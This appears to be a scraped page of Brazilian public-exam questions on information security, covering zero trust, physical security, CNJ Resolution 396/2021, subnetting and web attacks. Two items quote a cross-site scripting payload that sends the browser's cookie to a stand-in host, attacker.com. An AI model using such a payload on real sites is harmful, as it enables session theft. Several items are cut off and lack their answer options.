Segurança da Informação Segurança física e lógica
Ano: 2022
Banca: CESPE / CEBRASPE

Uma área de escritório de determinada empresa é definida como de alta criticidade, tal que somente uma pequena parte de funcionários deve ter acesso às informações confidenciais utilizadas nesse ambiente.


Nessa situação, para controlar a segurança física na área em questão, é correto

Segurança da Informação Segurança física e lógica
Ano: 2022
Banca: CESPE / CEBRASPE
Em uma arquitetura zero trust para proteção de perímetro, o elemento lógico que tem a função de tomar a decisão final de acesso a um recurso para determinada ação denomina-se
Segurança da Informação Segurança física e lógica
Ano: 2022
Banca: IADES
A arquitetura Zero Trust é um paradigma de cibersegurança focado na proteção e na premissa de que a confiança nunca é garantida implicitamente. Assinale a alternativa que representa os objetivos da arquitetura. 
Segurança da Informação Segurança física e lógica
Ano: 2022
Banca: CESPE / CEBRASPE

Com relação à segurança da informação, julgue o item seguinte.



Os detectores de incêndio são mecanismos eletrônicos que acionam alarmes em casos de fogo nas instalações e, nessa situação, funcionam como soluções de segurança digital de ambientes de TI.

Segurança da Informação Segurança de sistemas de informação Noções de Segurança Segurança na Internet + 1
Ano: 2022
Banca: FCC
De acordo com a Resolução CNJ nº 396/2021, que institui a Estratégia Nacional de Segurança Cibernética do Poder Judiciário (ENSEC-PJ), são objetivos da ENSEC-PJ: tornar o Judiciário mais seguro e inclusivo no ambiente digital; aumentar a resiliência às ameaças cibernéticas; estabelecer governança de segurança cibernética e fortalecer a gestão e coordenação integrada de ações de segurança cibernética nos órgãos do Poder Judiciário; e
Segurança da Informação Segurança física e lógica
Ano: 2022
Banca: FCC
Considere o contexto da Resolução nº 396 de 07/06/2021. A ENSEC-PJ prevista nesta Resolução contempla:

I. temas relacionados à segurança da informação, de forma ampla, que sejam essenciais para segurança cibernética.
II. segurança lógica e proteção de dados específicos do nível operacional, nos aspectos relacionados aos requisitos funcionais.
III. segurança física e proteção de ativos de tecnologia da informação de forma geral;
IV. ações destinadas a assegurar, de forma automatizada, a não invasão física de localidades e de informações.

Está correto o que consta APENAS de
Segurança da Informação Segurança física e lógica
Ano: 2022
Banca: FCC
Um Técnico do Tribunal Regional do Trabalho configurou, hipoteticamente, o endereço IPv4 172.22.171.1/25 na interface de rede de um servidor e o último endereço válido como gateway padrão. Com base no endereço configurado, o gateway padrão é
18 Q877730
Segurança da Informação
Ano: 2020
Banca: CESPE / CEBRASPE
Julgue o próximo item, a respeito de criptografia, ataque a rede de computadores e segurança de servidores e de estações de trabalho.

Honeypot é uma técnica pela qual um atacante utiliza um equipamento conectado à rede de computadores para tirar de operação um serviço, um computador ou toda uma rede conectada à Internet.
19 Q877725
Segurança da Informação
Ano: 2020
Banca: CESPE / CEBRASPE

Considere, ainda, que um atacante tenha alterado o parâmetro CC no browser pelo código a seguir.


><script>document.location=

'http://www.attacker.com/cgi-bin/cookie.cgi?

foo='+document.cookie</script>

Nesse caso, o risco de segurança da aplicação é a desserialização insegura.


Limitar o número máximo de tentativas de autenticação falhadas, ou atrasar progressivamente essa operação, e registar todas as falhas e alertar os administradores quando detectados ataques de teste exaustivo ou de força bruta são formas de prevenir a quebra de autenticação.

20 Q877724
Segurança da Informação
Ano: 2020
Banca: CESPE / CEBRASPE

Considere, ainda, que um atacante tenha alterado o parâmetro CC no browser pelo código a seguir.


><script>document.location=

'http://www.attacker.com/cgi-bin/cookie.cgi?

foo='+document.cookie</script>

Nesse caso, o risco de segurança da aplicação é a desserialização insegura.


Muitas aplicações web e APIs não protegem de forma adequada dados sensíveis, como dados financeiros, de saúde ou de identificação pessoal, por isso, para sua proteção, é necessário classificar os dados processados, armazenados ou transmitidos pela aplicação.